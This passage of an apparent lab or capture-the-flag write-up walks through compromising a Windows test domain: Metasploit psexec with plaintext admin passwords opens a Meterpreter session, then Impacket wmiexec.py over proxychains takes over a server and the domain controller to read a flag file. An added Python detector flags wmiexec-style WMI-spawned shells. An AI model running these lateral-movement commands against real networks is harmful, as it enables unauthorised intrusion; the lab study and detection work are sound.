RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass 123qwe!ASD no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser administrator no The username to authenticate as
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.93.30 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.93.30:445 - Connecting to the server...
[*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'administrator'...
[*] 192.168.93.30:445 - Selecting PowerShell target
[*] 192.168.93.30:445 - Executing the payload...
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.30:4444
[*] Sending stage (200774 bytes) to 192.168.93.30
[*] Meterpreter session 5 opened (192.168.93.100:34678 -> 192.168.93.30:4444 via session 4) at 2023-12-04 10:28:38 +0800
meterpreter >
Locate the domain controller
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: test.org
[+] Domain NetBIOS Name: TEST
[+] Domain Controller: WIN-8GA56TNV3MV.test.org (IP: 192.168.93.10)
meterpreter >
The domain controller is 192.168.93.10.
Information gathering
meterpreter > shell
Process 1228 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : win7
Primary Dns Suffix . . . . . . . : test.org
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : test.org
Ethernet adapter Bluetooth Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
Physical Address. . . . . . . . . : 3C-55-76-DC-AB-F6
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-0C-29-E0-74-2B
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::fcc9:1e77:245c:9cf3%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.93.30(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-53-70-00-0C-29-E0-74-2B
DNS Servers . . . . . . . . . . . : 192.168.93.10
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{9155D380-FF00-44EB-AE88-938EA5D2CAB2}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{A0E4F0B0-B72B-4DC5-8935-EA51628015E2}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
C:\Windows\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest
3、wmiexec.py
wmiexec.py is a tool for executing WMI (Windows Management Instrumentation) commands and scripts on Windows systems. WMI is part of Microsoft's Windows management architecture and can be used to manage and monitor system resources and services on local and remote computers.
wmiexec.py lets the user run WMI commands and scripts from the command line and communicate with remote computers. The tool is commonly used for system administration, troubleshooting and remote task execution.
Attack flow for 192.168.93.20
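On the target, wmiexec.py executes each command through WMI's Win32_Process.Create, so the shell is a child of WmiPrvSE.exe, and by default it redirects output to a file under the ADMIN$ share (1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1) that the client reads back over SMB. The process-creation checker below is an added example, not code from the write-up or from Impacket; the Sysmon-style events are constructed samples, and the field names are assumed.

```python
"""Flag process-creation events that match the wmiexec.py execution pattern.

Added example, not from the original write-up or from Impacket. Assumes
Sysmon-style process-creation records with parent image, image, command line
and user fields. The sample events are constructed, not captured from the lab.
"""
import re
from dataclasses import dataclass

# Default wmiexec.py output redirect: \\127.0.0.1\ADMIN$\__<unix timestamp>
WMIEXEC_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.IGNORECASE)


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str
    user: str


def classify(ev):
    """Return a finding label for one process-creation event, or None."""
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    child = ev.image.lower().rsplit("\\", 1)[-1]
    if parent == "wmiprvse.exe" and child in ("cmd.exe", "powershell.exe"):
        if WMIEXEC_REDIRECT.search(ev.command_line):
            return "wmiexec: WMI-spawned shell with ADMIN$ output redirect"
        # A shell under WmiPrvSE.exe is rare on workstations even without
        # the redirect (wmiexec.py -nooutput, or other WMI lateral movement)
        return "suspicious: WMI-spawned shell"
    return None


def scan(events):
    """Return (host, user, label) for every event that matches a pattern."""
    return [(ev.host, ev.user, label) for ev in events if (label := classify(ev))]


def sample_events():
    """Constructed events: one wmiexec-style, one WMI shell, one benign."""
    return [
        ProcessEvent("WIN2008", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                     r"C:\Windows\System32\cmd.exe",
                     r"cmd.exe /Q /c ipconfig /all 1> \\127.0.0.1\ADMIN$\__1701656318.4 2>&1",
                     r"TEST\Administrator"),
        ProcessEvent("WIN2008", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                     r"C:\Windows\System32\cmd.exe",
                     r"cmd.exe /c whoami", r"TEST\Administrator"),
        ProcessEvent("WIN7", r"C:\Windows\explorer.exe",
                     r"C:\Windows\System32\cmd.exe", "cmd.exe", r"WIN7\user"),
    ]


if __name__ == "__main__":
    for finding in scan(sample_events()):
        print(finding)
```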
┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains4 python3 wmiexec.py 'administrator:123qwe!ASD@192.168.93.20'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.20:445 ... OK
[*] SMBv2.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.20:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.20:49154 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : win2008
Primary Dns Suffix . . . . . . . : test.org
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : test.org
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-0C-29-AB-44-EC
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::e9c2:7728:85f1:d04f%10(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.93.20(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-55-47-00-0C-29-AB-44-EC
DNS Servers . . . . . . . . . . . : 192.168.93.10
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter Local Area Connection* 8:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : isatap.{964D2F17-AE7C-4B46-9E2B-EB123D2EEFEA}
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
C:\>net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest
The command completed with one or more errors.
Attack flow for 192.168.93.10
┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:49154 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : WIN-8GA56TNV3MV
Primary Dns Suffix . . . . . . . : test.org
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : test.org
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
Physical Address. . . . . . . . . : 00-0C-29-1F-54-D2
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::1fa:2f8:97ac:1160%12(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.93.10(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 301993001
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-57-BB-00-0C-29-1F-54-D2
DNS Servers . . . . . . . . . . . : ::1
127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{22AC77BB-4205-4120-89CB-C8F5240403E0}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
C:\>net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest krbtgt
win2008 win7
The command completed with one or more errors.
C:\Users\Administrator\Desktop>whoami
test\administrator
OK, using the wmiexec.py script from the impacket package we have successfully compromised the internal hosts win2008 (192.168.93.20) and WIN-8GA56TNV3MV (192.168.93.10, internal host).
7、get flag
┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:49154 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
Volume in drive C has no label.
Volume Serial Number is D6DC-065A
Directory of C:\
08/22/2013 11:52 PM <DIR> PerfLogs
10/28/2019 08:44 PM <DIR> Program Files
08/22/2013 11:39 PM <DIR> Program Files (x86)
10/06/2019 07:14 PM <DIR> Users
12/04/2023 11:18 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 52,819,361,792 bytes free
C:\>cd Users
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is D6DC-065A
Directory of C:\Users
10/06/2019 07:14 PM <DIR> .
10/06/2019 07:14 PM <DIR> ..
10/06/2019 07:14 PM <DIR> Administrator
08/22/2013 11:39 PM <DIR> Public
0 File(s) 0 bytes
4 Dir(s) 52,819,361,792 bytes free
C:\Users>cd Administrator
C:\Users\Administrator>dir
Volume in drive C has no label.
Volume Serial Number is D6DC-065A
Directory of C:\Users\Administrator
10/06/2019 07:14 PM <DIR> .
10/06/2019 07:14 PM <DIR> ..
10/30/2019 10:12 PM <DIR> Contacts
10/31/2019 12:52 AM <DIR> Desktop
10/31/2019 12:52 AM <DIR> Documents
10/30/2019 10:12 PM <DIR> Downloads
10/30/2019 10:12 PM <DIR> Favorites
10/30/2019 10:12 PM <DIR> Links
10/30/2019 10:12 PM <DIR> Music
10/30/2019 10:12 PM <DIR> Pictures
10/30/2019 10:12 PM <DIR> Saved Games
10/30/2019 10:12 PM <DIR> Searches
10/30/2019 10:12 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 52,819,357,696 bytes free
C:\Users\Administrator>cd Documents
C:\Users\Administrator\Documents>dir
Volume in drive C has no label.
Volume Serial Number is D6DC-065A
Directory of C:\Users\Administrator\Documents
10/31/2019 12:52 AM <DIR> .
10/31/2019 12:52 AM <DIR> ..
10/31/2019 12:53 AM 13 flag.txt
1 File(s) 13 bytes
2 Dir(s) 52,819,361,792 bytes free
C:\Users\Administrator\Documents>type flag.txt
this is flag!
C:\Users\Administrator\Documents>
Finally, we have obtained the important file flag.txt on the domain controller.